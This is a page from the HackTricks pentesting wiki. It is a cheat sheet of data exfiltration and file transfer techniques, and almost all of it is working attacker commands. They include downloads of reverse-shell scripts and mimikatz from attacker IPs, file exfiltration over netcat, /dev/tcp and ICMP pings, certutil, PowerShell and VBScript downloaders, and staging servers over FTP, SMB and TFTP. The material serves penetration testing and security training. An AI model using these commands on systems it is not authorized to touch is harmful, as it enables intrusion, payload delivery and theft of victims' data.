HackTricks
Search…
Pentesting
Powered By GitBook
Exfiltration

Copy&Paste Base64

Linux

1
base64 -w0 <file> #Encode file
2
base64 -d file #Decode file
Copied!

Windows

1
certutil -encode payload.dll payload.b64
2
certutil -decode payload.b64 payload.dll
Copied!

HTTP

Linux

1
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
2
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
3
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
4
fetch 10.10.14.14:8000/shell.py #FreeBSD
Copied!

Windows

1
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
2
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
3
4
#PS
5
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
6
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
7
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
8
9
Import-Module BitsTransfer
10
Start-BitsTransfer -Source $url -Destination $output
11
#OR
12
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
Copied!

Upload files

HTTPS Server

1
# from https://gist.github.com/dergachev/7028596
2
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
3
# generate server.xml with the following command:
4
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
5
# run as follows:
6
# python simple-https-server.py
7
# then in your browser, visit:
8
# https://localhost:443
9
10
import BaseHTTPServer, SimpleHTTPServer
11
import ssl
12
13
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
14
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
15
httpd.serve_forever()
Copied!

FTP

FTP server (python)

1
pip3 install pyftpdlib
2
python3 -m pyftpdlib -p 21
Copied!

FTP server (NodeJS)

1
sudo npm install -g ftp-srv --save
2
ftp-srv ftp://0.0.0.0:9876 --root /tmp
Copied!

FTP server (pure-ftp)

1
apt-get update && apt-get install pure-ftp
Copied!
1
#Run the following script to configure the FTP server
2
#!/bin/bash
3
groupadd ftpgroup
4
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
5
pure-pwd useradd fusr -u ftpuser -d /ftphome
6
pure-pw mkdb
7
cd /etc/pure-ftpd/auth/
8
ln -s ../conf/PureDB 60pdb
9
mkdir -p /ftphome
10
chown -R ftpuser:ftpgroup /ftphome/
11
/etc/init.d/pure-ftpd restart
Copied!

Windows client

1
#Work well with python. With pure-ftp use fusr:ftp
2
echo open 10.11.0.41 21 > ftp.txt
3
echo USER anonymous >> ftp.txt
4
echo anonymous >> ftp.txt
5
echo bin >> ftp.txt
6
echo GET mimikatz.exe >> ftp.txt
7
echo bye >> ftp.txt
8
ftp -n -v -s:ftp.txt
Copied!

SMB

Kali as server
1
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
2
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
3
#For new Win10 versions
4
impacket-smbserver -smb2support -user test -password test test `pwd`
Copied!
Or create a smb share using samba:
1
apt-get install samba
2
mkdir /tmp/smb
3
chmod 777 /tmp/smb
4
#Add to the end of /etc/samba/smb.conf this:
5
[public]
6
comment = Samba on Ubuntu
7
path = /tmp/smb
8
read only = no
9
browsable = yes
10
guest ok = Yes
11
#Start samba
12
service smbd restart
Copied!
Windows
1
CMD-Wind> \\10.10.14.14\path\to\exe
2
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
3
4
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
5
WindPS-2> cd new_disk:
Copied!

SCP

The attacker has to have SSHd running.
1
scp <username>@<Attacker_IP>:<directory>/<filename>
Copied!

NC

1
nc -lvnp 4444 > new_file
2
nc -vn <IP> 4444 < exfil_file
Copied!

/dev/tcp

Download file from victim

1
nc -lvnp 80 > file #Inside attacker
2
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
Copied!

Upload file to victim

1
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
2
# Inside victim
3
exec 6< /dev/tcp/10.10.10.10/4444
4
cat <&6 > file.txt
Copied!
thanks to @BinaryShadow_

ICMP

1
#In order to exfiltrate the content of a file via pings you can do:
2
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
3
#This will 4bytes per ping packet (you could probablie increase this until 16)
Copied!
1
from scapy.all import *
2
#This is ippsec receiver created in the HTB machine Mischief
3
def process_packet(pkt):
4
if pkt.haslayer(ICMP):
5
if pkt[ICMP].type == 0:
6
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
7
print(f"{data.decode('utf-8')}", flush=True, end="")
8
9
sniff(iface="tun0", prn=process_packet)
Copied!

SMTP

If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
1
sudo python -m smtpd -n -c DebuggingServer :25
Copied!

TFTP

By default in XP and 2003 (in others it need to be explicitly added during installation)
In Kali, start TFTP server:
1
#I didn't get this options working and I prefer the python option
2
mkdir /tftp
3
atftpd --daemon --port 69 /tftp
4
cp /path/tp/nc.exe /tftp
Copied!
TFTP server in python:
1
pip install ptftpd
2
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>
Copied!
In victim, connect to the Kali server:
1
tftp -i <KALI-IP> get nc.exe
Copied!

PHP

Download a file with a PHP oneliner:
1
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
Copied!

VBScript

1
Attacker> python -m SimpleHTTPServer 80
Copied!

Victim

1
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
2
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
3
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
4
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
5
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
6
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
7
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
8
echo Err.Clear >> wget.vbs
9
echo Set http = Nothing >> wget.vbs
10
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
11
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
12
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
13
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
14
echo http.Open "GET", strURL, False >> wget.vbs
15
echo http.Send >> wget.vbs
16
echo varByteArray = http.ResponseBody >> wget.vbs
17
echo Set http = Nothing >> wget.vbs
18
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
19
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
20
echo strData = "" >> wget.vbs
21
echo strBuffer = "" >> wget.vbs
22
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
23
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
24
echo Next >> wget.vbs
25
echo ts.Close >> wget.vbs
Copied!
1
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
Copied!

Debug.exe

This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the debug.exe program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like netcat. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with debug.exe.
Debug.exe can only assemble 64 kb. So we need to use files smaller than that. We can use upx to compress it even more. So let's do that:
1
upx -9 nc.exe
Copied!
Now it only weights 29 kb. Perfect. So now let's disassemble it:
1
wine exe2bat.exe nc.exe nc.txt
Copied!
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe

DNS

Last modified 1mo ago